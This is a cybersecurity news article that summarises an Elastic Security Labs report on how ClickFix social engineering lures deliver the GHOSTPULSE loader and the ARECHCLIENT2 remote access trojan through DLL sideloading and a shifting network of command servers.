ClickFix technique widely used to deliver multi-stage malware campaigns

ClickFix technique widely used to deliver multi-stage malware campaigns

Malicious actors are increasingly leveraging a sophisticated social engineering tactic known as ‘ClickFix’ to deliver multi-stage malware campaigns targeting users across various sectors, according to a new report from Elastic Security Labs.

ClickFix, first observed last year, tricks victims into copying and pasting malicious PowerShell that results in malware execution. Once triggered, the commands initiate a complex infection chain designed to evade detection and compromise systems.

Elastic’s latest telemetry reveals that ClickFix is increasingly being used to distribute updated variants of the GHOSTPULSE loader (aka HIJACKLOADER or IDATLOADER), that downloads the ARECHCLIENT2 remote access trojan (RAT) and infostealer.

In recent campaigns analyzed by Elastic, the infection starts with the ClickFix lure, leading users to launch a PowerShell script that downloads a ZIP file named ComponentStyle.zip. Inside are components for a DLL sideloading attack, including a benign executable (Crysta_X64.exe) and a malicious DLL (DllXDownloadManager.dll). These are used to decrypt and load additional files, including Heeschamjet.rc and Shonomteak.bxi, which contain encrypted payloads and configuration data.

The GHOSTPULSE loader, which has been active since 2023 and regularly updated with new evasion techniques, deploys an intermediate .NET loader, which, in turn, loads ARECHCLIENT2 directly into memory using reflective techniques. This multi-layered strategy helps bypass antivirus detection and ensures stealthy data exfiltration.

First seen in 2019, ARECHCLIENT2 (aka SECTOPRAT) is capable of harvesting sensitive data, executing commands remotely, and maintaining persistent access.

Elastic’s infrastructure analysis indicates that threat actors has been using a compromised digital advertising agency’s server to host and distribute the malicious content. The campaign also relies on a constantly shifting network of command-and-control (C2) servers, with over 120 unique servers across various autonomous systems identified in the past seven months alone.


Back to the list

Latest Posts

FBI-wanted member of ransomware gang arrested in Ukraine, extradited to the US

FBI-wanted member of ransomware gang arrested in Ukraine, extradited to the US

Using custom-developed malware, including ransomware such as LockerGoga, MegaCortex, HIVE and Dharma, the hackers encrypted data on corporate networks.
18 June 2025
Russian crypto executive sentenced to prison in US for market manipulation scheme

Russian crypto executive sentenced to prison in US for market manipulation scheme

In a 2019 interview, Andriunin openly described building algorithms to carry out these fake trades.
18 June 2025
ClickFix technique widely used to deliver multi-stage malware campaigns

ClickFix technique widely used to deliver multi-stage malware campaigns

ClickFix tricks victims into copying and pasting malicious PowerShell that results in malware execution.
18 June 2025
Popular Posts
Featured vulnerabilities
IBM DataStage on Cloud Pak for Data update for OkHostnameVerifier.java package
Medium Patched | 18 Jun, 2025
IBM Sterling B2B Integrator and IBM Sterling File Gateway update for Apache Kafka Client
Medium Patched | 18 Jun, 2025
IBM Cloud Pak for Data update for HTTP/2 protocol
High Patched | 18 Jun, 2025
IBM Cloud Pak for Data update for moby
Low Patched | 18 Jun, 2025
Multiple vulnerabilities in Apache Traffic Server
Medium Patched | 18 Jun, 2025